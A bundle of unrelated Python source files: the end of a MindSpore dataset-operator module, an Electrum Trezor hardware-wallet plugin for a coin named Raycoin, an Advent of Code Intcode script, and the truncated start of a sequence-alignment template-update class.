return cde.FilterNode(children[0], self.predicate, self.input_columns)
class RepeatDataset(UnionBaseDataset):
"""
The result of applying Repeat operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be repeated.
count (int): Number of times the dataset will be repeated (default=-1, repeat indefinitely).
"""
def __init__(self, input_dataset, count):
super().__init__(children=input_dataset)
self.count = replace_none(count, -1)
def parse(self, children=None):
return cde.RepeatNode(children[0], self.count)
class SkipDataset(UnionBaseDataset):
"""
The result of applying Skip operator to the input Dataset.
Args:
input_dataset (Dataset): Input dataset to have elements skipped.
count (int): Number of elements to be skipped in the dataset.
"""
def __init__(self, input_dataset, count):
super().__init__(input_dataset)
self.count = count
def parse(self, children=None):
return cde.SkipNode(children[0], self.count)
class TakeDataset(UnionBaseDataset):
"""
The result of applying Take operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to have elements taken from.
count (int): Number of elements to be taken from the dataset.
"""
def __init__(self, input_dataset, count):
super().__init__(children=input_dataset)
self.count = count
def parse(self, children=None):
return cde.TakeNode(children[0], self.count)
class ZipDataset(UnionBaseDataset):
"""
The result of applying Zip operator to the input Dataset.
Args:
datasets (tuple): A tuple of datasets to be zipped together.
Raises:
TypeError: If dataset is not an instance of Dataset.
"""
def __init__(self, datasets):
super().__init__(children=datasets)
def parse(self, children=None):
return cde.ZipNode(children)
def is_sync(self):
return any([c.is_sync() for c in self.children])
class ConcatDataset(UnionBaseDataset):
"""
The result of applying concat dataset operator to the input Dataset.
Args:
datasets (list): A list of datasets to be concatenated together.
Raises:
TypeError: If dataset is not an instance of Dataset.
ValueError: If there are no samples in one of the datasets.
"""
def __init__(self, datasets):
super().__init__(children=datasets)
for dataset in datasets:
if not isinstance(dataset, Dataset):
raise TypeError("Invalid dataset, expected Dataset object, but got %s!" % type(dataset))
self.datasets = datasets
self._sampler = samplers.SequentialSampler(num_samples=None)
self.children_sizes_ = [c.get_dataset_size() for c in self.children]
child_index = 0
for item in self.children_sizes_:
if item == 0:
raise ValueError("There are no samples in the dataset number %d. Please make sure there are "
"valid samples in the dataset." % child_index)
child_index += 1
# _children_flag_and_nums: A list of (int, int) pairs. The first element of each pair is a flag that indicates
# whether the dataset is mappable; the second element is the length of the dataset.
self._children_flag_and_nums = []
# _children_start_end_index_: A list of (int, int) pairs. The elements of each pair characterize
# the valid position range of the dataset at that index when sampling.
self._children_start_end_index_ = []
for index, child in enumerate(self.children):
tem_list = [-1, -1]
self._children_start_end_index_.append(tem_list)
dataset_len = self.children_sizes_[index]
from mindspore.dataset.engine.datasets_user_defined import GeneratorDataset
if isinstance(child, GeneratorDataset) and not hasattr(child.source, "__getitem__"):
dataset_len = 0
self.children_sizes_[index] = 0
if isinstance(child, MappableDataset):
self._children_flag_and_nums.append((0, dataset_len))
else:
self._children_flag_and_nums.append((1, dataset_len))
def parse(self, children=None):
return cde.ConcatNode(children, self._sampler, self._children_flag_and_nums, self._children_start_end_index_)
def use_sampler(self, sampler):
"""
Set a DistributedSampler for the concat dataset.
Args:
sampler (Sampler): The sampler to use for the current dataset.
Currently supported: DistributedSampler.
Raises:
TypeError: If the sampler is not an instance of DistributedSampler.
ValueError: If the parameter shuffle of the sampler is True.
ValueError: If the parameter num_samples of the sampler is not None.
ValueError: If num_shards <= 0.
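Examples:
>>> # A minimal sketch (assumes `concat_dataset` was built, e.g. with dataset_1 + dataset_2,
>>> # and that `ds` is mindspore.dataset); shuffle must be False and num_samples left unset.
>>> sampler = ds.DistributedSampler(num_shards=2, shard_id=0, shuffle=False)
>>> concat_dataset.use_sampler(sampler)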
"""
if not isinstance(sampler, samplers.DistributedSampler):
raise TypeError("The parameter %s of concat must be DistributedSampler!" % sampler)
if sampler.is_shuffled():
raise ValueError("The parameter shuffle of DistributedSampler must be False!")
if sampler.num_shards <= 0:
raise ValueError("The parameter num_shards of DistributedSampler must be positive int!")
if sampler.get_num_samples() is not None:
raise ValueError("The parameter num_samples of DistributedSampler is not support to be set!")
self.dataset_size = None
self._sampler = sampler
cumulative_samples_nums = 0
for index, child in enumerate(self.children):
if hasattr(child, 'sampler') and child.sampler.get_num_samples() is not None:
raise ValueError("The parameter NumSamples of %s is not support to be set!" % child)
if isinstance(child, BatchDataset):
raise TypeError("The parameter %s of concat must not be BatchDataset!" % child)
# if child is mappable and the length is greater than 0
if not self._children_flag_and_nums[index][0] and self._children_flag_and_nums[index][1]:
tem_value = cumulative_samples_nums + self._children_flag_and_nums[index][1]
if not self._children_flag_and_nums[index][1] >= sampler.num_shards:
if tem_value < sampler.num_shards:
self._children_start_end_index_[index][0] = cumulative_samples_nums
self._children_start_end_index_[index][1] = tem_value
else:
self._children_start_end_index_[index][0] = cumulative_samples_nums
self._children_start_end_index_[index][1] = tem_value % sampler.num_shards
tem_sampler = copy.deepcopy(sampler)
tem_sampler.set_offset(cumulative_samples_nums)
child.use_sampler(tem_sampler)
cumulative_samples_nums += self.children_sizes_[index]
cumulative_samples_nums %= sampler.num_shards
class RenameDataset(UnionBaseDataset):
"""
The result of applying Rename operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be Renamed.
input_columns (Union[str, list[str]]): List of names of the input columns.
output_columns (Union[str, list[str]]): List of names of the output columns.
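Examples:
>>> # A minimal sketch of the typical entry point, Dataset.rename(); column names
>>> # are illustrative.
>>> dataset = dataset.rename(input_columns=["old_col"], output_columns=["new_col"])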
"""
def __init__(self, input_dataset, input_columns, output_columns):
super().__init__(children=input_dataset)
self.input_column_names = to_list(input_columns)
self.output_column_names = to_list(output_columns)
def parse(self, children=None):
return cde.RenameNode(children[0], self.input_column_names, self.output_column_names)
def to_list(items):
if items is None:
return []
if isinstance(items, tuple):
return list(items)
if not isinstance(items, list):
return [items]
return items
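# Behaviour sketch for to_list (illustrative, not exhaustive):
#   to_list(None)       -> []
#   to_list("col1")     -> ["col1"]
#   to_list(("a", "b")) -> ["a", "b"]
#   to_list(["a", "b"]) -> ["a", "b"]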
class ProjectDataset(UnionBaseDataset):
"""
The result of applying Project operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be Projected.
columns (Union[str, list[str]]): List of names of the columns to project.
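Examples:
>>> # A minimal sketch of the typical entry point, Dataset.project(); keeps only the
>>> # listed columns (names are illustrative).
>>> dataset = dataset.project(columns=["col1", "label"])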
"""
def __init__(self, input_dataset, columns):
super().__init__(children=input_dataset)
self.columns = to_list(columns)
def parse(self, children=None):
return cde.ProjectNode(children[0], self.columns)
class _ToDevice:
"""
Internal class to handle sending data to device.
"""
def __init__(self, dataset, num_epochs):
ir_tree, self.api_tree = dataset.create_ir_tree()
self._runtime_context = cde.PythonRuntimeContext()
self._runtime_context.Init()
self._to_device = cde.ToDevice(num_epochs)
self._to_device.Init(ir_tree)
self._runtime_context.AssignConsumer(self._to_device)
ITERATORS_LIST.append(weakref.ref(self))
_unset_iterator_cleanup()
def send(self):
self._to_device.Send()
def reset(self, step):
self._to_device.Reset(step)
def stop_send(self):
"""
Send a stop-send signal to the pipeline; used when the end of sequence is sent at the epoch end.
"""
self._to_device.StopSend()
def continue_send(self):
"""
Send a continue-send signal to the pipeline; used when the end of sequence is sent at the epoch end.
"""
self._to_device.ContinueSend()
def get_data_info(self):
"""
Get type and shape of current batch.
"""
return self._to_device.GetDataInfo()
def release(self):
"""
Manually terminate Device Queue instead of relying on out of scope destruction.
"""
if hasattr(self, '_runtime_context') and self._runtime_context:
if hasattr(self, '_to_device') and self._to_device:
self._runtime_context.Terminate()
del self._to_device
del self._runtime_context
def __deepcopy__(self, memodict):
return self
def get_offload_model(self, col_names):
"""
Get offload model containing removed offload ops from pipeline.
"""
offload_model = GetOffloadModel(self._to_device, col_names)
return offload_model
class TransferDataset(Dataset):
"""
The result of applying TDT operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be transferred.
send_epoch_end (bool, optional): Whether to send end of sequence to device or not (default=True).
create_data_info_queue (bool, optional): Whether to create queue which stores
types and shapes of data or not (default=False).
Raises:
TypeError: If device_type is empty.
ValueError: If device_type is not 'Ascend', 'GPU' or 'CPU'.
RuntimeError: If dataset is unknown.
"""
def __init__(self, input_dataset, send_epoch_end=True, create_data_info_queue=False):
super().__init__(children=input_dataset)
self.queue_name = str(uuid.uuid1())
self.device_type = context.get_context("device_target") if context else "CPU"
self.device_id = context.get_context("device_id") if context else 0
self._send_epoch_end = replace_none(send_epoch_end, True)
self._create_data_info_queue = create_data_info_queue
self._to_device = None
def parse(self, children=None):
total_batch = 0
if hasattr(self.children[0], "__total_batch__"):
total_batch = self.children[0].__total_batch__
return cde.TransferNode(children[0], self.queue_name, self.device_type, self.device_id, self._send_epoch_end,
total_batch, self._create_data_info_queue)
def create_dict_iterator(self, num_epochs=-1, output_numpy=False):
raise RuntimeError("TransferDataset is not iterable.")
def create_tuple_iterator(self, columns=None, num_epochs=-1, output_numpy=False, do_copy=True):
raise RuntimeError("TransferDataset is not iterable.")
def __iter__(self):
raise RuntimeError("TransferDataset is not iterable.")
def output_shapes(self):
raise RuntimeError("TransferDataset does not support obtaining output_shapes.")
def output_types(self):
raise RuntimeError("TransferDataset does not support obtaining output_types.")
@check_to_device_send
def send(self, num_epochs=-1):
"""
Send to device
"""
if Dataset._noop_mode():
return
if self._to_device is not None:
del self._to_device
self._to_device = _ToDevice(self, num_epochs)
self._to_device.send()
def stop_send(self):
if self._to_device is not None:
self._to_device.stop_send()
def continue_send(self):
if self._to_device is not None:
self._to_device.continue_send()
def reset(self, step):
if self._to_device is not None:
logger.info("Reset the dataset pipeline to step " + str(step))
self._to_device.reset(step)
def get_data_info(self):
"""
Get type and shape of current batch
"""
if self._to_device is not None:
return self._to_device.get_data_info()
raise RuntimeError("Calling get_data_info with bad state.")
def get_offload_model(self):
if self._to_device is not None:
return self._to_device.get_offload_model(self.get_col_names())
raise RuntimeError("get_offload_model, _to_device is None")
def release(self):
"""
Manually terminate Device Queue instead of relying on out of scope destruction.
"""
if self._to_device is not None:
self._to_device.release()
class Schema:
"""
Class to represent a schema of a dataset.
Args:
schema_file(str): Path of the schema file (default=None).
Returns:
Schema object, schema info about dataset.
Raises:
RuntimeError: If schema file failed to load.
Examples:
>>> from mindspore import dtype as mstype
>>>
>>> # Create schema; specify column name, mindspore.dtype and shape of the column
>>> schema = ds.Schema()
>>> schema.add_column(name='col1', de_type=mstype.int64, shape=[2])
"""
@check_schema
def __init__(self, schema_file=None):
self.schema_file = replace_none(schema_file, "")
self.cpp_schema = cde.SchemaObj(self.schema_file)
@check_add_column
def add_column(self, name, de_type, shape=None):
"""
Add new column to the schema.
Args:
name (str): The name of the new column.
de_type (str): Data type of the column.
shape (list[int], optional): Shape of the column
(default=None, [-1] which is an unknown shape of rank 1).
Raises:
ValueError: If column type is unknown.
"""
if isinstance(de_type, typing.Type):
de_type = mstype_to_detype(de_type)
col_type = str(de_type)
else:
col_type = str(cde.DataType(de_type))
if shape is None:
self.cpp_schema.add_column(name, col_type)
else:
self.cpp_schema.add_column(name, col_type, shape)
def parse_columns(self, columns):
"""
Parse the columns and add them to self.
Args:
columns (Union[dict, list[dict], tuple[dict]]): Dataset attribute information, decoded from schema file.
- list[dict]: 'name' and 'type' must be in the keys; 'shape' is optional.
- dict: columns.keys() are the column names, columns.values() are dicts containing 'type' and optionally 'shape'.
Raises:
RuntimeError: If failed to parse columns.
RuntimeError: If column's name field is missing.
RuntimeError: If column's type field is missing.
Examples:
>>> from mindspore.dataset import Schema
>>> schema = Schema()
>>> columns1 = [{'name': 'image', 'type': 'int8', 'shape': [3, 3]},
... {'name': 'label', 'type': 'int8', 'shape': [1]}]
>>> schema.parse_columns(columns1)
>>> columns2 = {'image': {'shape': [3, 3], 'type': 'int8'}, 'label': {'shape': [1], 'type': 'int8'}}
>>> schema.parse_columns(columns2)
"""
self.cpp_schema.parse_columns(json.dumps(columns, indent=2))
def to_json(self):
"""
Get a JSON string of the schema.
Returns:
str, JSON string of the schema.
"""
return self.cpp_schema.to_json()
def from_json(self, json_obj):
"""
Get schema file from JSON object.
Args:
json_obj (dict): Parsed JSON object.
Raises:
RuntimeError: if there is an unknown item in the object.
RuntimeError: if the dataset type is missing in the object.
RuntimeError: if columns are missing in the object.
"""
self.cpp_schema.from_string(json.dumps(json_obj, indent=2))
def __str__(self):
return self.to_json()
@staticmethod
def get_num_rows(schema):
schema_obj = schema
if not isinstance(schema_obj, Schema):
schema_obj = Schema(schema_obj)
return schema_obj.cpp_schema.get_num_rows()
class DeserializedDataset(Dataset):
def __init__(self, input_obj):
super().__init__()
self.input_obj = input_obj
def parse(self, children=None):
if isinstance(self.input_obj, dict):
json_str = json.dumps(self.input_obj)
return cde.Dataset.from_json_string(json_str)
return cde.Dataset.from_json_file(self.input_obj)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='TREZOR',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
# note that this call can still raise!
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# Returns the client for a given keystore; can use xpub.
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Raycoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from the user
                # because no more than one change output is allowed
                # note: this restriction can be removed once we require firmware
                # that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
            # probably a segwit input, and we don't need this previous txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
part1.py
|
from aoc2019.intcode_computer import IntCodeComputer
import multiprocessing as mp
def part1():
pass
if __name__ == '__main__':
iq = mp.Queue()
oq = mp.Queue()
program = '1102,34915192,34915192,7,4,7,99,0'
program = '109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99'
with open('input.txt') as f:
program = f.read()
comp = IntCodeComputer(stdio=True, relative_base=0)
# p = mp.Process(target=comp.run_program, args=(program,), kwargs={'mem': 10000,
# 'input_queue': iq,
# 'output_queues': [oq]})
comp.run_program(program, mem=10000)
# 3989758265: right answer!
# p.start()
# # iq.put(1)
# p.join()
#
#
# while True:
# try:
# print(oq.get(block=False))
# except:
# break
    # incorrect: 203 - too low
|
TemplateUpdate.py
|
import numpy as np
import pandas as pd
from multiprocessing import Process, Queue, current_process, freeze_support, cpu_count
from NW import NW
from DTW import DTW
from utils import *
import copy
import random
class TemplateUpdate(object):
    def __init__(self, executor, thetag=0.4, cpu=0):
        self.executor = executor
        self.mode = type(executor).__name__
        self.thetag = thetag
        self.cpu = cpu
    def execute(self, one_seqs):
        """Progressively align and merge the sequences in one_seqs with the configured
        executor (NW or DTW): pairwise scores are computed, the most similar pair is
        merged repeatedly (inserting gaps as needed), and an updated template is built
        by column-wise averaging. Returns (new_template, gap-padded sequences)."""
one_seqs_t = copy.deepcopy(one_seqs)
### MSA_amended
MSA_index = [i for i in range(len(one_seqs_t))]
MSA_columns = [i for i in range(len(one_seqs_t))]
MSA_scores = pd.DataFrame(np.zeros([len(one_seqs_t),len(one_seqs_t)]),index=MSA_index,columns=MSA_columns)
##################
if self.cpu == 0:
if self.mode == 'NW':
for i in range(len(one_seqs_t)):
for j in range(i+1,len(one_seqs_t)):
score_t = self.executor.execute(one_seqs_t[i], one_seqs_t[j], 0)
MSA_scores.iloc[i,j] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[j])]
else:
for i in range(len(one_seqs_t)):
for j in range(i+1,len(one_seqs_t)):
score_t = self.executor.execute(one_seqs_t[i], one_seqs_t[j], 0)
MSA_scores.iloc[i,j] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[j])-1]
##################
else:
PROCESSES = cpu_count()
if PROCESSES > 20:
PROCESSES = 20
#NW for every line
